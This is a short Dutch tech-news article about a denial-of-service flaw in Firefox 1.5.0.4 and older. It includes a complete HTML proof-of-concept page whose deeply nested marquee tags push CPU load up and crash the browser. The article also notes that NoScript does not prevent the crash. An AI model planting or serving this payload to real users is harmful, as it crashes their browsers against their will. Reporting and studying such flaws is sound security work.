1 min

Tags in dit artikel

, ,

Er zit een lek in Firefox 1.5.0.4 en ouder. Door een bepaalde html code in een website op te nemen, kan je er redelijk makkelijk voor zorgen dat de vuurvos crasht.

Het is een zogenaamde DoS aanval, wat staat voor denial of service. Door het programma een aantal html tags te laten verwerken, gaat de CPU load omhoog en kan het programma crashen. Er is nog geen update voor het lek, wat ook geldt voor de oudere versies van Firefox.

Hieronder staat een voorbeeldcode:

PHP Code

1
2
3
4
5
6
7
8
9
10
11
12
 
<html>
<head>
<title>Credit's go to n00b</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
 
<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>

Mensen met de patch noScript hebben óók last van dit probleem, daar scheen verwarring over te zijn.